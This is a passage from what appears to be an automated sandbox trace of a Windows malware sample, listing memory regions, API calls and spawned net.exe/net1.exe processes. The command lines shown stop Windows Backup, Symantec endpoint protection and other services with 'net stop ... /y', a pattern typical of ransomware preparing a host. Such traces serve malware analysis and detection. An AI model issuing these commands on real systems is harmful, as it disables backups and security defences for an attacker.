"pagefile_0x0000000000010000" filename = "" Region: id = 9788 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9789 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9790 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 9791 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 9792 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9793 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9794 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9795 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9796 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9797 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9798 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9799 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9800 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9801 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9802 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9803 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9804 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9805 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9806 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9807 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9808 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9809 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9826 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 740 os_tid = 0xf08 [0109.837] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f890 | out: lpSystemTimeAsFileTime=0x28f890*(dwLowDateTime=0xf69d9130, dwHighDateTime=0x1d48689)) [0109.837] GetCurrentProcessId () returned 0xea8 [0109.837] GetCurrentThreadId () returned 0xf08 [0109.837] GetTickCount () returned 0x252d0 [0109.837] QueryPerformanceCounter (in: lpPerformanceCount=0x28f898 | out: lpPerformanceCount=0x28f898*=1815675500000) returned 1 [0109.838] GetModuleHandleW (lpModuleName=0x0) returned 0xff3f0000 [0109.917] __set_app_type (_Type=0x1) [0109.917] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff409c9c) returned 0x0 [0109.917] __getmainargs (in: _Argc=0xff414780, _Argv=0xff414790, _Env=0xff414788, _DoWildCard=0, _StartInfo=0xff41479c | out: _Argc=0xff414780, _Argv=0xff414790, _Env=0xff414788) returned 0 [0109.918] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.918] GetConsoleOutputCP () returned 0x1b5 [0109.918] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff41cec0 | out: lpCPInfo=0xff41cec0) returned 1 [0109.918] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0109.920] sprintf_s (in: _DstBuf=0x28f838, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0109.920] setlocale (category=0, locale=".437") returned="English_United States.437" [0109.922] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.922] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0109.922] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SDRSVC /y" [0109.922] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0109.922] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0109.922] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28f828 | out: Buffer=0x28f828*=0x64d40) returned 0x0 [0109.922] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28f828 | out: Buffer=0x28f828*=0x6c0e0) returned 0x0 [0109.922] _fileno (_File=0x7fefdba2a80) returned 0 [0109.922] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0109.923] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0109.923] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0109.923] _wcsicmp (_String1="config", _String2="stop") returned -16 [0109.923] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0109.923] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0109.923] _wcsicmp (_String1="file", _String2="stop") returned -13 [0109.923] _wcsicmp (_String1="files", _String2="stop") returned -13 [0109.923] _wcsicmp (_String1="group", _String2="stop") returned -12 [0109.923] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0109.923] _wcsicmp (_String1="help", _String2="stop") returned -11 [0109.923] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0109.923] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0109.923] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0109.923] _wcsicmp (_String1="session", _String2="stop") returned -15 [0109.923] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0109.923] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0109.923] _wcsicmp (_String1="share", _String2="stop") returned -12 [0109.923] _wcsicmp (_String1="start", _String2="stop") returned -14 [0109.923] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0109.923] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0109.923] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0109.923] _wcsicmp (_String1="accounts", _String2="SDRSVC") returned -18 [0109.923] _wcsicmp (_String1="computer", _String2="SDRSVC") returned -16 [0109.923] _wcsicmp (_String1="config", _String2="SDRSVC") returned -16 [0109.923] _wcsicmp (_String1="continue", _String2="SDRSVC") returned -16 [0109.923] _wcsicmp (_String1="cont", _String2="SDRSVC") returned -16 [0109.923] _wcsicmp (_String1="file", _String2="SDRSVC") returned -13 [0109.923] _wcsicmp (_String1="files", _String2="SDRSVC") returned -13 [0109.923] _wcsicmp (_String1="group", _String2="SDRSVC") returned -12 [0109.924] _wcsicmp (_String1="groups", _String2="SDRSVC") returned -12 [0109.924] _wcsicmp (_String1="help", _String2="SDRSVC") returned -11 [0109.924] _wcsicmp (_String1="helpmsg", _String2="SDRSVC") returned -11 [0109.924] _wcsicmp (_String1="localgroup", _String2="SDRSVC") returned -7 [0109.924] _wcsicmp (_String1="pause", _String2="SDRSVC") returned -3 [0109.924] _wcsicmp (_String1="session", _String2="SDRSVC") returned 1 [0109.924] _wcsicmp (_String1="sessions", _String2="SDRSVC") returned 1 [0109.924] _wcsicmp (_String1="sess", _String2="SDRSVC") returned 1 [0109.924] _wcsicmp (_String1="share", _String2="SDRSVC") returned 4 [0109.924] _wcsicmp (_String1="start", _String2="SDRSVC") returned 16 [0109.924] _wcsicmp (_String1="stats", _String2="SDRSVC") returned 16 [0109.924] _wcsicmp (_String1="statistics", _String2="SDRSVC") returned 16 [0109.924] _wcsicmp (_String1="stop", _String2="SDRSVC") returned 16 [0109.924] _wcsicmp (_String1="time", _String2="SDRSVC") returned 1 [0109.924] _wcsicmp (_String1="user", _String2="SDRSVC") returned 2 [0109.924] _wcsicmp (_String1="users", _String2="SDRSVC") returned 2 [0109.924] _wcsicmp (_String1="msg", _String2="SDRSVC") returned -6 [0109.924] _wcsicmp (_String1="messenger", _String2="SDRSVC") returned -6 [0109.924] _wcsicmp (_String1="receiver", _String2="SDRSVC") returned -1 [0109.924] _wcsicmp (_String1="rcv", _String2="SDRSVC") returned -1 [0109.924] _wcsicmp (_String1="netpopup", _String2="SDRSVC") returned -5 [0109.924] _wcsicmp (_String1="redirector", _String2="SDRSVC") returned -1 [0109.924] _wcsicmp (_String1="redir", _String2="SDRSVC") returned -1 [0109.924] _wcsicmp (_String1="rdr", _String2="SDRSVC") returned -1 [0109.924] _wcsicmp (_String1="workstation", _String2="SDRSVC") returned 4 [0109.924] _wcsicmp (_String1="work", _String2="SDRSVC") returned 4 [0109.924] _wcsicmp (_String1="wksta", _String2="SDRSVC") returned 4 [0109.924] _wcsicmp (_String1="prdr", _String2="SDRSVC") returned -3 [0109.924] _wcsicmp (_String1="devrdr", _String2="SDRSVC") returned -15 [0109.924] _wcsicmp (_String1="lanmanworkstation", _String2="SDRSVC") returned -7 [0109.924] _wcsicmp (_String1="server", _String2="SDRSVC") returned 1 [0109.924] _wcsicmp (_String1="svr", _String2="SDRSVC") returned 18 [0109.924] _wcsicmp (_String1="srv", _String2="SDRSVC") returned 14 [0109.924] _wcsicmp (_String1="lanmanserver", _String2="SDRSVC") returned -7 [0109.924] _wcsicmp (_String1="alerter", _String2="SDRSVC") returned -18 [0109.925] _wcsicmp (_String1="netlogon", _String2="SDRSVC") returned -5 [0109.925] _wcsupr (in: _String="SDRSVC" | out: _String="SDRSVC") returned="SDRSVC" [0109.925] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6c900 [0109.929] GetServiceKeyNameW (in: hSCManager=0x6c900, lpDisplayName="SDRSVC", lpServiceName=0xff415750, lpcchBuffer=0x28f748 | out: lpServiceName="", lpcchBuffer=0x28f748) returned 0 [0109.930] _wcsicmp (_String1="msg", _String2="SDRSVC") returned -6 [0109.930] _wcsicmp (_String1="messenger", _String2="SDRSVC") returned -6 [0109.930] _wcsicmp (_String1="receiver", _String2="SDRSVC") returned -1 [0109.930] _wcsicmp (_String1="rcv", _String2="SDRSVC") returned -1 [0109.930] _wcsicmp (_String1="redirector", _String2="SDRSVC") returned -1 [0109.930] _wcsicmp (_String1="redir", _String2="SDRSVC") returned -1 [0109.930] _wcsicmp (_String1="rdr", _String2="SDRSVC") returned -1 [0109.930] _wcsicmp (_String1="workstation", _String2="SDRSVC") returned 4 [0109.930] _wcsicmp (_String1="work", _String2="SDRSVC") returned 4 [0109.930] _wcsicmp (_String1="wksta", _String2="SDRSVC") returned 4 [0109.930] _wcsicmp (_String1="prdr", _String2="SDRSVC") returned -3 [0109.930] _wcsicmp (_String1="devrdr", _String2="SDRSVC") returned -15 [0109.930] _wcsicmp (_String1="lanmanworkstation", _String2="SDRSVC") returned -7 [0109.931] _wcsicmp (_String1="server", _String2="SDRSVC") returned 1 [0109.931] _wcsicmp (_String1="svr", _String2="SDRSVC") returned 18 [0109.931] _wcsicmp (_String1="srv", _String2="SDRSVC") returned 14 [0109.931] _wcsicmp (_String1="lanmanserver", _String2="SDRSVC") returned -7 [0109.931] _wcsicmp (_String1="alerter", _String2="SDRSVC") returned -18 [0109.931] _wcsicmp (_String1="netlogon", _String2="SDRSVC") returned -5 [0109.931] NetServiceControl (in: servername=0x0, service="SDRSVC", opcode=0x0, arg=0x0, bufptr=0x28f750 | out: bufptr=0x28f750) returned 0x0 [0109.932] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x28f708 | out: Buffer=0x28f708*=0x70c70) returned 0x0 [0109.932] OpenServiceW (hSCManager=0x6c900, lpServiceName="SDRSVC", dwDesiredAccess=0xc) returned 0x6c960 [0109.932] QueryServiceStatus (in: hService=0x6c960, lpServiceStatus=0x28f6b0 | out: lpServiceStatus=0x28f6b0*(dwServiceType=0x10, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0109.933] GetServiceDisplayNameW (in: hSCManager=0x6c900, lpServiceName="SDRSVC", lpDisplayName=0xff415350, lpcchBuffer=0x28f688 | out: lpDisplayName="Windows Backup", lpcchBuffer=0x28f688) returned 1 [0109.933] NetApiBufferFree (Buffer=0x70c70) returned 0x0 [0109.933] CloseServiceHandle (hSCObject=0x6c960) returned 1 [0109.933] wcscpy_s (in: _Destination=0xff4180d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0109.933] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0109.934] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdc1, dwLanguageId=0x0, lpBuffer=0xff415b50, nSize=0x800, Arguments=0xff417f90 | out: lpBuffer="The Windows Backup service is not started.\r\n") returned 0x2c [0109.936] GetFileType (hFile=0xb) returned 0x2 [0109.936] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f5a8 | out: lpMode=0x28f5a8) returned 1 [0109.936] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff415b50*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x28f5a0, lpReserved=0x0 | out: lpBuffer=0xff415b50*, lpNumberOfCharsWritten=0x28f5a0*=0x2c) returned 1 [0109.936] GetFileType (hFile=0xb) returned 0x2 [0109.937] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f5a8 | out: lpMode=0x28f5a8) returned 1 [0109.937] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f5a0, lpReserved=0x0 | out: lpBuffer=0xff3f1efc*, lpNumberOfCharsWritten=0x28f5a0*=0x2) returned 1 [0109.937] _ultow (in: _Dest=0xdc1, _Radix=2684432 | out: _Dest=0xdc1) returned="3521" [0109.937] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff415b50, nSize=0x800, Arguments=0xff417f90 | out: lpBuffer="More help is available by typing NET HELPMSG 3521.\r\n") returned 0x34 [0109.937] GetFileType (hFile=0xb) returned 0x2 [0109.937] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f5a8 | out: lpMode=0x28f5a8) returned 1 [0109.938] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff415b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x28f5a0, lpReserved=0x0 | out: lpBuffer=0xff415b50*, lpNumberOfCharsWritten=0x28f5a0*=0x34) returned 1 [0109.938] GetFileType (hFile=0xb) returned 0x2 [0109.938] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f5a8 | out: lpMode=0x28f5a8) returned 1 [0109.938] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f5a0, lpReserved=0x0 | out: lpBuffer=0xff3f1efc*, lpNumberOfCharsWritten=0x28f5a0*=0x2) returned 1 [0109.939] NetApiBufferFree (Buffer=0x64d40) returned 0x0 [0109.939] NetApiBufferFree (Buffer=0x6c0e0) returned 0x0 [0109.939] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SDRSVC /y" [0109.939] exit (_Code=2) Process: id = "261" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x56afd000" os_pid = "0xef4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SmcService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9810 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9811 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9812 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9813 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 9814 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9815 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9816 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9817 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9818 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9819 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9820 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 9821 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 9822 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 9823 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9824 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 741 os_tid = 0xdec Process: id = "262" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x64c1d000" os_pid = "0xe5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SMTPSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9827 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9828 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9829 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9830 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 9831 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9832 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9833 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9834 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9835 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9836 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9837 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 9838 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9839 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 9840 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9841 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 743 os_tid = 0x129c Process: id = "263" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5791b000" os_pid = "0x126c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "256" os_parent_pid = "0xe50" cmd_line = "C:\\Windows\\system32\\net1 stop SepMasterService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9842 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9843 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9844 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9845 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 9846 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9847 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9848 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9849 start_va = 0xff910000 end_va = 0xff942fff entry_point = 0xff910000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 9850 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9851 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9852 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 9853 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9854 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9855 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9856 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9948 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9949 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9950 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9951 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 9952 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 9953 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9954 start_va = 0x7f0e0000 end_va = 0x7ffdffff 